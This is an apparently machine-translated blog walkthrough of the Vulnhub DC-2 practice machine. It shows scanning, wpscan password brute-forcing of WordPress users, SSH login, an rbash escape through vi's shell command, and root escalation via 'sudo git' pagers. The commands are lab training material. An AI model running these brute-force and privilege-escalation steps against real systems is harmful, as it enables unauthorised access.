【Try to Hack】vulnhub DC2

Blog home page ： Happy star The blog home page of
Series column ：Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time ：2022 year 6 month 29 Japan
The author's level is very limited , If an error is found , Please let me know , thank ！

Target aircraft knowledge points ：
1、hosts file
2、dirb Scan directory
3、wpscan Enumerate user names
4、cewl Crawl password
5、ssh Service login
6、rbash The escape
7、git Raise the right

The first is the bridging mode
It should be noted that this range is not static IP, that 192.168.0.145 Just an example , Tell us how to set up hosts Of documents

Download the target as usual , It defaults to the bridge mode

No need to change

kali The attacker also sets the bridge mode （ I did it like this ）

netdiscover Host discovery
Because the target is not in bridge mode , And our kali It may not be in the same segment
arp-scan -l Can only scan and kali Hosts in the same network segment

This is our target plane , because VMare,Inc

Port scanning
namp -sV -p- 192.168.0.131

80 Port open , visit 192.168.0.131

This is the result

According to the description of the topic at the beginning , Go set up hosts
vim /etc/hosts

Successful visit

Prompt us to use cewl
whatweb 192.168.0.131

yes wordpress

dirb http://192.168.0.131
Directory scanning

http://192.168.0.131/wp-admin/
It may be backstage , Visit

Is, indeed, , Account and password required
Now we use cewl Well
Crawling website content , Generate Dictionary

cewl dc-2 > dc-2.txt

This is the password dictionary

We use wpscan Get username
wpscan --url http://dc-2 -e u

Save as user.txt

wpscan --url http://dc-2 --usernames user.txt --passwords dc-2.txt
use bp It's fine too

Sign in jerry, Just look for it


Remind us not to use wordpress A loophole in the

I thought I could write shell Of

Log in with two accounts and passwords ssh

ssh -p 7744 [email protected]192.168.0.131
ssh -p 7744 [email protected]192.168.0.131

Log in , Also found that flag3 了
But the command to read the file is ban 了

See what commands you can use

echo $PATH
echo /home/tom/usr/bin/*

vi flag3.txt

I saw it flag
see wp understand , Let's use it tom The user switches to jerry
Need to use su

rbash The escape
rbash With the general shell The difference is that it limits some behaviors , Make some commands impossible to execute .
【 Penetration test 】— rbash Brief description of escape methods

stay vi Of ： You can put /bin/bash Copy to shell
vi
Input :
:set shell=/bin/sh
Input again :
:shell
obtain shell 了

 After the switch is completed, add environment variables . to $PATH Add two paths to the variable , Used to find commands 
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

succeed
Look for flag

Tips git
git Raise the right

 Method 1 
sudo git help config
!/bin/bash  or  ！‘sh’

 Method 2 
sudo git -p help
!/bin/bash